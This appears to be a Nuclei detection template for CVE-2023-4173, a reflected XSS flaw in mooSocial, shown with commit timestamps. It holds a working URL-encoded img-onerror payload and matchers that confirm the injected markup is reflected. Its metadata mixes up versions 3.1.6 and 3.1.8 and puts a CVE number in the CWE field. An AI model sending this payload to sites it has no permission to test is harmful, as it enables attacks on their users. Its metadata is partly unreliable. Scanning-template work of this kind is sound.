nuclei-templates/http/cves/2023/CVE-2023-4173.yaml

47 lines
1.2 KiB
YAML
Raw Normal View History

2023-08-15 16:37:28 +00:00
id: CVE-2023-4173
info:
name: mooSocial 3.1.8 - Reflected XSS
author: momika233
2023-08-17 13:06:07 +00:00
severity: medium
description: >
2023-08-18 05:03:49 +00:00
A vulnerability, which was classified as problematic, was found in mooSocial mooStore 3.1.6. Affected is an unknown function of the file /search/index.
2023-08-15 16:37:28 +00:00
reference:
- https://www.exploit-db.com/exploits/51670
2023-08-17 13:06:07 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2023-4173
- http://packetstormsecurity.com/files/174016/mooSocial-3.1.8-Cross-Site-Scripting.html
2023-08-15 16:37:28 +00:00
classification:
2023-08-17 13:06:07 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
2023-08-15 16:37:28 +00:00
cwe-id: CVE-2023-4173
metadata:
max-request: 1
verified: true
2023-08-17 13:06:07 +00:00
fofa-query: mooSocial
tags: cve,cve2023,moosocial,xss
2023-08-15 16:37:28 +00:00
2023-08-17 13:06:07 +00:00
http:
2023-08-15 16:37:28 +00:00
- method: GET
path:
2023-08-17 13:06:07 +00:00
- "{{BaseURL}}/classified/%22%3E%3Cimg%20src=a%20onerror=alert('document.\
domain')%3E/search?category=1"
2023-08-15 16:37:28 +00:00
matchers-condition: and
matchers:
- type: word
2023-08-17 13:06:07 +00:00
part: body
2023-08-15 16:37:28 +00:00
words:
2023-08-17 13:06:07 +00:00
- "<img src=a onerror=alert('document.domain')>"
- "mooSocial"
condition: and
2023-08-15 16:37:28 +00:00
- type: word
part: header
words:
- text/html
2023-08-18 05:03:49 +00:00
2023-08-15 16:37:28 +00:00
- type: status
status:
2023-08-17 13:06:07 +00:00
- 404